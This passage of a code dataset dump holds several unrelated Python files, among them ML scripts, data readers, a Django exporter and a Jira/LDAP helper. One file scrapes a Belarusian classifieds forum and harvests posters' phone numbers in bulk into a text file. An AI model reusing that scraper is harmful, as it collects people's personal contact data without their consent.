NationalCode.is_valid(str(code)):\n                return 
code\n","sub_path":"nationalcode.py","file_name":"nationalcode.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"641930879","text":"#problem 3.1\n__author__ = 'jamie'\n\nimport sys\nimport MapReduce\n\n# Part 1\nmr = MapReduce.MapReduce()\n\n# Part 2\ndef mapper(record):\n    # 0: matrix name\n    # 1: row\n    # 2: column\n    # 3: value\n\n    #Relation M(I, J, V) with tuples (m, i, j, v=m_ij)\n    if record[0] == 'a':\n        M = record[0]\n        i = record[1]\n        j = record[2]\n        v = record[3]\n        for k in range(5):\n            mr.emit_intermediate((i, k), [M, j, v])\n\n    #Relation N(J, K, W) with tuples (n, j, k, w=n_jk)\n    if record[0] == 'b':\n        N = record[0]\n        j = record[1]\n        k = record[2]\n        w = record[3]\n        for i in range(5):\n            mr.emit_intermediate((i, k), [N, j, w])\n\n\n# Part 3\ndef reducer(key, values):\n    # key: (i, k)\n    # values: [matrix name, j, value]\n    # goal: find common j values for both matrices and sum the products of the values\n    #mr.emit((key, values))\n    M = {v[1]:v[2] for v in values if v[0] == 'a'}\n    N = {v[1]:v[2] for v in values if v[0] == 'b'}\n    J = set.intersection(set(M.keys()), set(N.keys()))\n    total = sum([M[j] * N[j] for j in J])\n    mr.emit((key[0], key[1], total))\n\n\n# Part 4\ndef main():\n    if len(sys.argv) >= 2:\n        data = sys.argv[1]\n    else:\n        data = \"data/matrix.json\"\n\n    with open(data, 'r') as f:\n        mr.execute(f, mapper, reducer)\n\n\n\nif __name__ == '__main__':\n    main()\n\n\n\n","sub_path":"assignment3/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"50715378","text":"\nfrom pandas import read_csv\nfrom datetime import datetime\n# load data\n#def parse(x):\n#\treturn datetime.strptime(x, '%Y %m %d %H')\n\ndataset = read_csv('simulator.ver1.csv', index_col=-1)\n\nfrom math import sqrt\nfrom numpy import concatenate\nfrom matplotlib import pyplot\nfrom pandas import read_csv\nfrom pandas import DataFrame\nfrom pandas import concat\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import mean_squared_error\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\n\n# load dataset\ndataset = read_csv('simulator.ver1.csv', header=0)\nvalues = dataset.values\n# ensure all data is float\nvalues = values.astype('float32')\n# normalize features\nscaler = MinMaxScaler(feature_range=(0, 1))\nscaled = scaler.fit_transform(values)\n\n# split into train and test sets\nn = scaled.shape[0]\nprint(n, type(n), scaled.shape)\ntrain = scaled[:int(n*0.9), :]\ntest = scaled[int(n*0.9):, :]\n# split into input and outputs\ntrain_X, train_y = train[:, :-2], train[:, -2:]\ntest_X, test_y = test[:, :-2], test[:, -2:]\n# reshape input to be 3D [samples, timesteps, features]\ntrain_X = train_X.reshape((train_X.shape[0], 1, train_X.shape[1]))\ntest_X = test_X.reshape((test_X.shape[0], 1, test_X.shape[1]))\n\nmodel = Sequential()\nmodel.add(LSTM(train_X.shape[2], input_shape=(train_X.shape[1], train_X.shape[2])))\nmodel.add(Dense(2))\nmodel.compile(loss='mae', optimizer='adam')\n\n# fit network\nhistory = model.fit(train_X, train_y, epochs=300, batch_size=72, validation_data=(test_X, test_y), verbose=2, shuffle=False)\n\n# plot history\npyplot.plot(history.history['loss'], label='train')\npyplot.plot(history.history['val_loss'], label='test')\npyplot.legend()\npyplot.show()\n\n# 
make a prediction\nyhat = model.predict(test_X)\n\n# Graph 1\npyplot.title(\"Prediction y1\")\npyplot.plot(yhat[:, 0], 'red', label='y1 predict rain')\npyplot.plot(test_y[:, 0], 'blue', label='y1 test rain')\npyplot.legend()\npyplot.show()\n# Graph 2\npyplot.title(\"Prediction y2\")\npyplot.plot(yhat[:, 1], 'red', label='y2 predict cloud')\npyplot.plot(test_y[:, 1], 'blue', label='y2 test cloud')\npyplot.legend()\npyplot.show()\n\ntest_X = test_X.reshape((test_X.shape[0], test_X.shape[2]))\n#train_X = train_X.reshape((train_X.shape[0], train_X.shape[2]))\n\n# invert scaling for forecast\ninv_yhat = concatenate((yhat, test_X[:, :]), axis=1)\n#print(inv_yhat.shape)\n#print(train_X.shape, train_y.shape, test_X.shape, test_y.shape)\n\n#inv_yhat = inv_yhat.reshape((inv_yhat.shape[0], inv_yhat.shape[2]))\n#print(inv_yhat.shape)\ninv_yhat = scaler.inverse_transform(inv_yhat)\ninv_yhat = inv_yhat[:,0]\n# invert scaling for actual\ntest_y = test_y.reshape((len(test_y), 2))\ninv_y = concatenate((test_y, test_X[:, :]), axis=1)\n\n\ninv_y = scaler.inverse_transform(inv_y)\ninv_y = inv_y[:,0]\n# calculate RMSE\nrmse = sqrt(mean_squared_error(inv_y, inv_yhat))\nprint('***Test RMSE: %.3f***' % rmse)\n\n","sub_path":".ipynb_checkpoints/lstm-checkpoint.py","file_name":"lstm-checkpoint.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148652328","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 21 16:16:44 2020\n\n@author: Knaak001\n\"\"\"\n\nimport os\nimport geopandas as gpd\nimport pandas as pd\nimport numpy as np\nfrom shapely.geometry import Point\nfrom shapely.geometry import box\nfrom tqdm import tqdm\ntqdm.pandas()\n\ndef thickness_sand_layers(df):\n \"\"\"\n Determine the thickness of sand layers and label all layers with a \n unique ID in a dataframe of a core\n\n Parameters\n ----------\n df: DataFrame\n Pandas DataFrame of the core \n\n Returns\n -------\n core: DataFrame\n Pandas DataFrame of the core\n \"\"\"\n core = df.copy()\n ## create column of 0/1 for nosand/sand\n core['sand'] = None\n core.loc[core['textuur'].str[0]=='z', 'sand'] = 1\n core['sand'] = core['sand'].fillna(0)\n\n ## give ID to consecutive sand layers\n core['layer_ID'] = (core['sand'] != core['sand'].shift(1)).cumsum()\n \n ## calculate difference between the layers to determine the amount of layers of 10cm\n diff_layers = np.diff(core.diepte)\n factor = np.insert(diff_layers, 0, core.diepte.iloc[0])/10\n core['factor'] = factor.astype(int)\n factor_len = core['factor'].sum() # number of 10cm layers in core\n \n ## determine top of each layer\n core['top'] = core['diepte']-(factor*10)\n core['top'] = core['top'].astype(int)\n \n core = core.loc[np.repeat(core.index.values, core.factor)]\n core['new_depth'] = [i for i in range(core['top'].iloc[0]+10,\n core['top'].iloc[0]+\\\n (factor_len.sum()*10)+1, 10)]\n \n ## determine the thickness of all layers\n thickness = core.groupby('layer_ID')['new_depth'].\\\n apply(lambda x: x.max()-x.min()+10).\\\n reset_index(name='thickness')\n \n ## add thickness to core as new column\n core = pd.merge(core, thickness, on='layer_ID', how='left')\n \n ## create good output\n outcols = ['top', 'thickness', 'text', 'm50', 'sand', 'layer_ID']\n core = core.drop_duplicates(subset=['layer_ID', 'm50'])\n core['text'] = np.where(core.sand==1, 'Sand', 'Other')\n core = core[outcols]\n core = core.sort_values(by='top')\n \n return core\n\nclass ReadLLG:\n \"\"\"\n Class to read and interpet 
LLG data, consists of \"Hoofd\" and \"Data\"\n tables. \"Hoofd\" table is opened as a GeoDataFrame and \"Data\" table\n is opened as a DataFrame.\n \"\"\"\n def __init__(self, path):\n self.path = path\n self.readHoofd()\n self.readData()\n \n def readHoofd(self):\n hoofd = os.path.join(self.path, 'llg_hoofd.txt')\n dtypes = {'GWT':str} # GWT column has variable datatypes \n self.hoofd = pd.read_csv(hoofd, dtype=dtypes)\n self.hoofd.columns = map(str.lower, self.hoofd.columns)\n self.hoofd['geometry'] = [Point(x, y) for x, y in\n zip(self.hoofd['xco'], self.hoofd['yco'])]\n \n self.hoofd = gpd.GeoDataFrame(self.hoofd, geometry='geometry')\n \n def readData(self):\n data = os.path.join(self.path, 'llg_data.txt')\n dtypes = {'RE':str, 'OG':str, 'CA':str, 'M':str, 'STRAT':str}\n self.data = pd.read_csv(data, dtype=dtypes)\n self.data.columns = map(str.lower, self.data.columns)\n \n def select_core_hoofd(self, core_ID):\n \"\"\"Select data for one or more specific cores\n core_ID: array_like\n Array or list of IDs of the cores to select\n \"\"\"\n core = self.hoofd.loc[self.hoofd['boorp'].isin(core_ID)]\n return core\n \n def select_core_data(self, core_ID):\n \"\"\"Select data for one or more specific cores\n core_ID: array_like\n Array or list of IDs of the cores to select\n \"\"\"\n core = self.data.loc[self.data['boorp'].isin(core_ID)]\n return core\n \n def select_with_polygon(self, polygon):\n \"\"\" Mask DataFrame with a polygon\n polygon: Shapely Polygon or MultiPolygon object\n \"\"\"\n to_mask = gpd.GeoDataFrame(geometry=[polygon])\n masked = gpd.sjoin(self.hoofd, to_mask, how='inner', op='within')\n \n data = self.data.loc[self.data['boorp'].isin(masked.boorp.unique())]\n return data\n \n def sand_layers(self):\n \"\"\"Return LLG data table grouped as sand layers with an ID and\n corresponding thickness\n \"\"\"\n layered = self.data.groupby('boorp').\\\n progress_apply(thickness_sand_layers)\n return layered\n \n\n\n","sub_path":"scripts/llg_reader.py","file_name":"llg_reader.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"381166421","text":"# The MIT License (MIT)\n#\n# Copyright (c) 2015, Nicolas Sebrecht & contributors\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\n\nDefine runners for the workers.\n\n\"\"\"\n\nimport traceback\n\nfrom ..constants import WRK\n\n\ndef ConsumerRunner(runner, ui, workerName, tasks, emitter):\n try:\n while True:\n try:\n task = tasks.getTask()\n if task is None: # No more task.\n break # Quit the consumer loop.\n\n runner.consume(task)\n ui.debugC(WRK, \"got task %s\"% task)\n\n except KeyboardInterrupt:\n raise\n\n # Handle exceptions we can safely ignore.\n except Exception as e:\n ui.error('%s exception occured: %s\\n%s',\n workerName, e, traceback.format_exc())\n raise\n\n emitter.stopServing()\n ui.debugC(WRK, \"runner ended\")\n except Exception as e:\n ui.critical(\"%s got Exception\", workerName)\n emitter.unkownInterruptionError(str(e))\n","sub_path":"imapfw/runners/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469079005","text":"from sys import stdout\n\nfrom mnist import MNIST\nimport math\n\nfrom cnn import CNN\n\nmnist = MNIST('Handwritten Training Sets/')\ntrainingImages, trainingLabelsPreFormat = mnist.load_training()\n\ndef printImage(image):\n\tpixelIndex = 0\n\tfor i in range(28):\n\t\tstdout.write(\"\\n\")\n\t\tfor j in range(28):\n\t\t\tif image[pixelIndex] > 0:\n\t\t\t\tstdout.write(\"###\")\n\t\t\telse:\n\t\t\t\tstdout.write(\". \")\n\t\t\tpixelIndex += 1\n\nfor i in range(len(trainingImages)):\n\tfor j in range(len(trainingImages[i])):\n\t\ttrainingImages[i][j] = float(trainingImages[i][j])/255\n\ntrainingLabels = []\nfor i in range(len(trainingLabelsPreFormat)):\n\tlabel = [0.0]*10\n\tlabel[trainingLabelsPreFormat[i]] = 1.0\n\ttrainingLabels.append(label)\n\ndef relu(x):\n\treturn max(0.0, x)\n\n\ndef reluDerivative(x):\n\tif x < 0:\n\t\treturn 0.0\n\telse:\n\t\treturn 1.0\n\n\ndef sigmoid(x):\n\ttry:\n\t\treturn 1.0/(1.0 + math.pow(math.e, -x))\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0.0\n\t\telse:\n\t\t\treturn 1.0\n\n\ndef sigmoidDerivative(x):\n\ttry:\n\t\treturn math.pow(math.e, -x)/math.pow(1 + math.pow(math.e, -x), 2)\n\texcept:\n\t\treturn 0.0\n\n\ndef tanh(x):\n\ttry:\n\t\treturn 2.0/(1 + math.pow(math.e, -2.0*x)) - 1\n\texcept:\n\t\tif x < 0:\n\t\t\treturn -1.0\n\t\telse:\n\t\t\treturn 1.0\n\n\ndef tanhDerivative(x):\n\ttry:\n\t\treturn (4.0*math.pow(math.e, -2.0*x))/math.pow(math.pow(math.e, -2.0*x) + 1, 2)\n\texcept:\n\t\treturn 0.0\n\n\ndef swish(x):\n\ttry:\n\t\treturn x/(1.0 + math.pow(math.e, -x))\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0.0\n\t\telse:\n\t\t\treturn x\n\n\ndef swishDerivative(x):\n\ttry:\n\t\treturn (1.0 + math.pow(math.e, -x)*(1.0 + x))/math.pow(1.0 + math.pow(math.e, -x), 2)\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0.0\n\t\telse:\n\t\t\treturn 1.0\n\ndef softPlus(x):\n\ttry:\n\t\treturn math.log(1 + math.pow(math.e, x), math.e)\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn x\n\ndef softPlusDerivative(x):\n\ttry:\n\t\treturn 1/(1 + math.pow(math.e, -x))\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn 1\n\ndef elu(x):\n\ta = 0.1\n\ttry:\n\t\tif x < 0:\n\t\t\treturn a*(math.pow(math.e, x) - 1)\n\t\telse:\n\t\t\treturn x\n\texcept:\n\t\tif x < 0:\n\t\t\treturn -a\n\t\telse:\n\t\t\treturn x\n\ndef eluDerivative(x):\n\ta = 
0.1\n\ttry:\n\t\tif x < 0:\n\t\t\treturn a*(math.pow(math.e, x) - 1) + a\n\t\telse:\n\t\t\treturn 1\n\texcept:\n\t\tif x < 0:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn 1\n\ndef prelu(x):\n\ta = 0.1\n\ttry:\n\t\tif x < 0:\n\t\t\treturn a*x\n\t\telse:\n\t\t\treturn x\n\texcept:\n\t\tif x < 0:\n\t\t\treturn a*x\n\t\telse:\n\t\t\treturn x\n\ndef preluDerivative(x):\n\ta = 0.1\n\ttry:\n\t\tif x < 0:\n\t\t\treturn a\n\t\telse:\n\t\t\treturn 1\n\texcept:\n\t\tif x < 0:\n\t\t\treturn a\n\t\telse:\n\t\t\treturn 1\n\ncnn_p = CNN.from_file('cnn.pickle')\nprintImage(trainingImages[7])\ncomputeValue = cnn_p.compute(trainingImages[7])\nprint(computeValue)\n\ncnn = CNN(784, 10, 0.01, swish, swishDerivative)\n# cnn.insert_layer(-1, 1024)\n# cnn.insert_layer(-1, 512)\n# cnn.insert_layer(-1, 256)\n# cnn.insert_layer(-1, 128)\n# cnn.insert_layer(-1, 64)\n# cnn.insert_layer(-1, 32)\ncnn.insert_layer(-1, 16)\ncnn.insert_layer(-1, 16)\ncnn.set_layer_activation_function(-1, \"softmax\", \"softmaxDerivative\")\n# cnn.set_layer_activation_function(-1, sigmoid, sigmoidDerivative)\nprint(cnn)\n\nstdout.write(\"Training...\\n\")\nfor i in range(len(trainingImages)):\n\tstdout.write(\"\\r\" + str(i + 1) + \"/\" + str(len(trainingImages)))\n\tcnn.train(trainingImages[i], trainingLabels[i])\n\nprintImage(trainingImages[7])\ncomputeValue = cnn.compute(trainingImages[7])\nprint(computeValue)\nprint(computeValue.index(max(computeValue)))\nprint(min(range(len(computeValue)), key=computeValue.__getitem__))\nprintImage(trainingImages[8])\ncomputeValue = cnn.compute(trainingImages[8])\nprint(computeValue)\nprint(computeValue.index(max(computeValue)))\nprint(min(range(len(computeValue)), key=computeValue.__getitem__))\nprintImage(trainingImages[9])\ncomputeValue = cnn.compute(trainingImages[9])\nprint(computeValue)\nprint(computeValue.index(max(computeValue)))\nprint(min(range(len(computeValue)), key=computeValue.__getitem__))\n\ncnn.save('cnn')\n\ndef getAccuracy(nn):\n\ttestingImages, testingLabelsPreFormat = mnist.load_testing()\n\tfor i in range(len(testingImages)):\n\t\tfor j in range(len(testingImages[i])):\n\t\t\ttestingImages[i][j] = float(testingImages[i][j])/255\n\tnumberCorrect = 0\n\tfor i in range(len(testingImages)):\n\t\tprediction = nn.compute(testingImages[i])\n\t\tif prediction.index(max(prediction)) == testingLabelsPreFormat[i]:\n\t\t\tnumberCorrect += 1\n\treturn numberCorrect/len(testingImages)\n\n\nprint(getAccuracy(cnn))\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"506027669","text":"import sys, requests, re\nfrom lxml import etree\n\ntemp = []\n#парсим предложения специалистов по отделке и ремонту\nurl = \"http://baraholka.onliner.by/viewforum.php?f=597&start=\"\nstart = 0\n\nwhile start <= 11000:\n res = requests.get(url + str(start))\n parser = etree.HTMLParser()\n root = etree.fromstring(res.text, parser)\n for element in root.iter(\"a\"):\n pattern = \"(\\/viewtopic.php\\?t=\\d+)\"\n tmp = re.findall(pattern, str(element.attrib))\n if tmp:\n string = \"http://baraholka.onliner.by\" + str(tmp[0])\n if string not in temp:\n print(string)\n temp.append(string)\n\n start += 50\n \n\nphones = []\nwith open(\"tt.txt\", \"a\") as file:\n for link in temp:\n print('link >> ', link)\n res1 = requests.get(link)\n pattern1 = \"\\+\\s?375\\s?\\({0,1}\\d{2}\\)?\\s?-?\\d{3}-?\\s?\\d{2}-?\\s?\\d{2}\"\n tmp2 = re.findall(pattern1, res1.text)\n if tmp2:\n for elem in 
tmp2:\n if elem not in phones:\n phones.append(elem) \n file.write(elem + '\\n')\n # print(tmp2)\n \n pattern2 = \"\\(\\d{3}\\)\\s?\\d{3}-\\d{2}-\\d{2}\"\n tmp3 = re.findall(pattern2, res1.text)\n if tmp3:\n for elem in tmp3:\n if elem not in phones:\n phones.append(elem)\n file.write(elem)\n # print(tmp3)\n \n pattern3 = \"8-?\\s?\\d{3}-?\\s?\\d{3}-?\\d{2}-?\\d{2}\"\n tmp4 = re.findall(pattern3, res1.text)\n if tmp4:\n for elem in tmp4:\n if elem not in phones:\n phones.append(elem)\n file.write(elem)\n # print(tmp4)\n \n pattern4 = \"029\\s?-?\\d{3}-?\\s?\\d{2}\\s?-?\\d{2}\"\n tmp5 = re.findall(pattern4, res1.text)\n if tmp5:\n for elem in tmp5:\n if elem not in phones:\n phones.append(elem)\n file.write(elem)\n # print(tmp5)\n \n# print(phones)\n","sub_path":"onliner.by-barakholka-parser.py","file_name":"onliner.by-barakholka-parser.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"550817647","text":"# imports\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\nfrom django.core import management\nfrom songs.models import *\nimport json\nimport datetime\nimport os\n# End: imports -----------------------------------------------------------------\n\n\nclass Command(BaseCommand):\n\n def db_to_txt(self):\n songs = Song.objects.all()\n\n name = input(\"Name the exported file: \")\n name += \"_lines-{}\".format(len(songs))\n name += \"_date-{:%d-%m-%y}\".format(datetime.datetime.now())\n if not name.endswith(\".txt\"):\n name += \".txt\"\n\n data = \"\"\n for song in songs:\n tags = song.tags.values_list('name')\n tags = [t[0] for t in tags]\n song = song.__dict__\n song = {'tittel': song['tittel'], 'artist': song['artist'], 'bpm': song['bpm'], 'tags': tags, 'spotify_URL': song['spotify_URL'], 'spotify_URI': song['spotify_URI'] }\n data += json.dumps(song, ensure_ascii=False) + \"\\n\"\n\n with open('songs/static/songs/private_files' + name, mode=\"w+\", encoding=\"UTF-8\") as file:\n file.write(data)\n\n\n def handle(self, *args, **options):\n self.db_to_txt()\n print(\"Done\")\n # End of handle\n","sub_path":"songs/management/commands/export_songs.py","file_name":"export_songs.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"319845747","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom .aad_client import AadClient\nfrom .aad_client_base import AadClientBase\nfrom .auth_code_redirect_handler import AuthCodeRedirectServer\nfrom .exception_wrapper import wrap_exceptions\nfrom .msal_credentials import ConfidentialClientCredential, PublicClientCredential\nfrom .msal_transport_adapter import MsalTransportAdapter, MsalTransportResponse\n\n\ndef _scopes_to_resource(*scopes):\n \"\"\"Convert an AADv2 scope to an AADv1 resource\"\"\"\n\n if len(scopes) != 1:\n raise ValueError(\"This credential supports only one scope per token request\")\n\n resource = scopes[0]\n if resource.endswith(\"/.default\"):\n resource = resource[: -len(\"/.default\")]\n\n return resource\n\n\n__all__ = [\n \"AadClient\",\n \"AadClientBase\",\n \"AuthCodeRedirectServer\",\n \"ConfidentialClientCredential\",\n \"MsalTransportAdapter\",\n \"MsalTransportResponse\",\n \"PublicClientCredential\",\n 
\"wrap_exceptions\",\n]\n","sub_path":"sdk/identity/azure-identity/azure/identity/_internal/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"166455894","text":"# -*- coding: utf-8 -*-\n\"\"\"\nShowcases *yellowness* computations.\n\"\"\"\n\nimport numpy as np\n\nimport colour\nfrom colour.utilities import message_box\n\nmessage_box('\"Yellowness\" Computations')\n\nXYZ = np.array([95.00000000, 100.00000000, 105.00000000])\nmessage_box(\n ('Computing \"yellowness\" using \"ASTM D1925\" method for '\n 'given sample \"CIE XYZ\" tristimulus values:\\n'\n '\\n\\t{0}\\n\\n'\n 'Warning: The input domain of that definition is non standard!'.format(\n XYZ)))\nprint(colour.yellowness(XYZ=XYZ, method='ASTM D1925'))\nprint(colour.colorimetry.yellowness_ASTMD1925(XYZ))\n\nprint('\\n')\n\nmessage_box(\n ('Computing \"yellowness\" using \"ASTM E313\" method for '\n 'given sample \"CIE XYZ\" tristimulus values:\\n'\n '\\n\\t{0}\\n\\n'\n 'Warning: The input domain of that definition is non standard!'.format(\n XYZ)))\nprint(colour.yellowness(XYZ=XYZ, method='ASTM E313'))\nprint(colour.colorimetry.yellowness_ASTME313(XYZ))\n","sub_path":"colour/examples/colorimetry/examples_yellowness.py","file_name":"examples_yellowness.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"579511123","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom pymongo import MongoClient\r\nfrom wordcloud import WordCloud, STOPWORDS\r\n\r\nconnection = MongoClient(\"mongodb://localhost:27018/\")\r\ndatabase = connection.StackOverFlowData\r\ncollection = database.Tags\r\n\r\ncomment_words = ''\r\nstopwords = set(STOPWORDS)\r\n\r\ndf = pd.DataFrame(list(collection.find()))\r\ndf['Id'] = df['Id'].apply(lambda x: int(x))\r\ndf['Count'] = df['Count'].apply(lambda x: int(x))\r\ndf.drop('_id', axis=1, inplace=True)\r\ndf.set_index('Id', inplace=True)\r\ndf.sort_values(by=['Count'], ascending=False, inplace=True)\r\nfinalLst = list(df['TagName'])\r\n\r\nfor val in finalLst:\r\n comment_words += \" \"\r\n comment_words += val\r\n comment_words += \" \"\r\n\r\nwordCloud = WordCloud(width=800, height=800, background_color='white', stopwords=stopwords, min_font_size=10).generate(comment_words)\r\nplt.figure(figsize=(8, 8), facecolor=None)\r\nplt.imshow(wordCloud)\r\nplt.axis(\"off\")\r\nplt.tight_layout(pad=0)\r\nplt.show()","sub_path":"Task-3/Part B/task3WordCloud.py","file_name":"task3WordCloud.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552549858","text":"import json\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nimport requests\nimport vault_auth\nfrom git import Repo\nfrom ldap3 import SUBTREE, Connection\nfrom requests.auth import HTTPBasicAuth\n\nPI_SLUG = \"Project Information\"\nnesting_level = 0\n\n\ndef get_vault_secret(user_id):\n secret = vault_auth.get_secret(\n user_id,\n iam_role=\"vault_jira_project_updater\",\n url=\"https://login.linaro.org:8200\"\n )\n return secret[\"data\"][\"pw\"]\n\n\ndef initialise_ldap():\n username = \"cn=bamboo-bind,ou=binders,dc=linaro,dc=org\"\n password = get_vault_secret(\"secret/ldap/{}\".format(username))\n return Connection(\n 'ldaps://login.linaro.org',\n user=username,\n password=password,\n auto_bind=True\n 
)\n\n\ndef initialise_auth():\n username = \"it.support.bot\"\n password = get_vault_secret(\"secret/ldap/{}\".format(username))\n return HTTPBasicAuth(username, password)\n\n\ndef jira_get(url, jira_auth):\n headers = {'content-type': 'application/json'}\n try:\n response = requests.get(\n \"https://projects.linaro.org/%s\" % url,\n headers=headers, auth=jira_auth)\n if response.status_code != 200:\n print(\"Getting %s failed with code %s\" % (url, response.status_code))\n sys.exit(1)\n return response.json()\n except Exception as e:\n print(\"While fetching %s, got exception: %s\" % (url, str(e)))\n sys.exit(1)\n\n\ndef get_all_projects(jira_auth):\n return jira_get(\"rest/api/2/project\", jira_auth)\n\n\ndef meta_value(meta_data, key, group=\"Project Visibility\"):\n for m in meta_data:\n if m[\"key\"] == key and m[\"group\"] == group:\n return m[\"value\"]\n return \"\"\n\n\ndef get_metadata(jira_projects, jira_auth):\n # Iterate through the projects, looking for projects\n # that have got metadata defined.\n meta_results = {}\n for p in jira_projects:\n meta = jira_get(\n \"rest/metadata/latest/project/%s?includeHidden=true\" % p[\"key\"], jira_auth)\n # Only include projects that are active, open and published\n if meta != []:\n pv_open = meta_value(meta, \"Open\")\n pv_active = meta_value(meta, \"Active\")\n pv_published = meta_value(meta, \"Published\")\n pv_visibility = meta_value(meta, \"property_visibility\", \"system\")\n if pv_open == \"Yes\" and pv_active == \"Yes\" and pv_published == \"Yes\" and pv_visibility != \"\":\n meta_results[p[\"key\"]] = meta\n else:\n print(\"Ignoring %s - open='%s', active='%s', published='%s', visibility='%s'\" % (\n p[\"key\"], pv_open, pv_active, pv_published, pv_visibility))\n else:\n print(\"Ignoring %s - no metadata\" % p[\"key\"])\n return meta_results\n\n\ndef get_specific_projects(metadata, jira_auth):\n results = []\n for key in metadata.keys():\n project = jira_get(\n \"rest/api/2/project/%s\" % key, jira_auth)\n results.append(project)\n return results\n\n\ndef lookup_email(email):\n # Try to get a display name back for the given email address.\n with initialise_ldap() as ldap_conn:\n if ldap_conn.search(\n \"dc=linaro,dc=org\",\n search_filter=\"(mail=%s)\" % email,\n search_scope=SUBTREE,\n attributes=[\"displayName\"]):\n return ldap_conn.entries[0].displayName.value\n return None\n\n\ndef htmlise_email(email):\n # If the email address ends with a full-stop, remove it\n # before wrapping tags around and then add it back\n # afterwards.\n if email[-1] == \".\":\n got_fullstop = True\n email = email[:-1]\n else:\n got_fullstop = False\n name = lookup_email(email)\n if name is None:\n result = \"<a href=\\\"mailto:%s\\\">%s</a>\" % (email, email)\n else:\n result = \"%s <a href=\\\"mailto:%s\\\">%s</a>\" % (name, email, email)\n if got_fullstop:\n result += \".\"\n return result\n\n\ndef htmlise_markdown(url):\n # Split on the |\n parts = url.split(\"|\")\n if len(parts) != 2:\n sys.exit(\"'%s' looks like markdown but isn't.\" % url)\n part1 = parts[0][1:]\n part2 = parts[1][:-1]\n return \"<a href=\\\"%s\\\">%s</a>\" % (part2, part1)\n \n\ndef htmlise_url(url):\n # Does the URL look like markdown?\n if url[0] == \"[\":\n return htmlise_markdown(url)\n # If the url ends with a full-stop, remove it\n # before wrapping tags around and then add it back\n # afterwards.\n if url[-1] == \".\":\n got_fullstop = True\n url = url[:-1]\n else:\n got_fullstop = False\n result = \"<a href=\\\"%s\\\">%s</a>\" % (url, url)\n if got_fullstop:\n result += \".\"\n return result\n\n\ndef find_markers(line, known_point, start_char, end_char, make_sane=True):\n 
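# Scan outwards from known_point: rfind() picks the nearest start_char to\n # the left, find() the nearest end_char to the right. With make_sane the\n # -1 \"not found\" sentinels are widened to the ends of the whole line, e.g.\n # find_markers(\"a b@c d\", 3, \" \", \" \") returns (2, 5), bracketing \"b@c\".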
start = line.rfind(start_char, 0, known_point)\n end = line.find(end_char, known_point)\n if make_sane:\n # Ensure that start & end either point at the start and\n # end of the entire string, or at the desired substring.\n if start == -1:\n start = 0\n else:\n # Point at the next char\n start += 1\n if end == -1:\n end = len(line)\n return start, end\n\n\ndef process_email(at_pos, line, result):\n start, end = find_markers(line, at_pos, \" \", \" \")\n # Now extract anything before 'start'\n if start != 0:\n result += line[:start]\n # Extract the email address\n addr = line[start:end]\n # and then remove that from the line.\n line = line[end:]\n result += htmlise_email(addr)\n return line, result\n\n\ndef process_url(url_pos, line, result):\n # This is slightly complicated by the fact that\n # we need to support Jira link markdown which\n # can support spaces in the readable text, so\n # we look for '[' first.\n start, 